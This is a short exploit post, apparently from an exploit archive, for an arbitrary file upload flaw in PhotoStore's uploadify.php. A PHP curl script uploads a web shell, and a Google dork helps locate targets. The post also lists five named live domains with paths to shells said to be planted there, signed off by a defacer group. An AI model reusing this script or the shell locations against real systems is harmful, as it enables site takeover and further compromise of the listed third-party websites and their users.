PhotoStore Arbitrary Shell upload Vulnerability

#######################################################

# Exploit Title:PhotoStore Arbitrary Shell upload

# Google Dork: "site:photocity.co.za"

# Exploit Author: Index Php

# Tested on: Windows, PHP 5.2

#######################################################

#exploit

 

<?php

 

$uploadfile="ip.php";

$ch = curl_init("http://target.com/assets/uploadify/old/uploadify.php");

curl_setopt($ch, CURLOPT_POST, true);

curl_setopt($ch, CURLOPT_POSTFIELDS,

array('Filedata'=>"@$uploadfile",

'folder'=>'/'));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);

curl_close($ch);

 

print "$postResult";

?>

 

shell path:

[+] Shell : photocity.co.za/ip.php?ina=hajar

[+] Shell : www.rogueeventdigitals.co.uk/ip.php?ina=hajar

[+] Shell : www.saladeprensa.co/ip.php?ina=hajar

[+] Shell : www.stockthatphoto.co.uk/ip.php?ina=hajar

[+] Shell : photokaya.com/ip.php?ina=hajar

 

greets Gantengers Crew - all Indonesian Defacer

 

# FFDF36BF31390169   1337day.com [2014-01-03]   DDFBA9F1D69A009E #

 

Sumber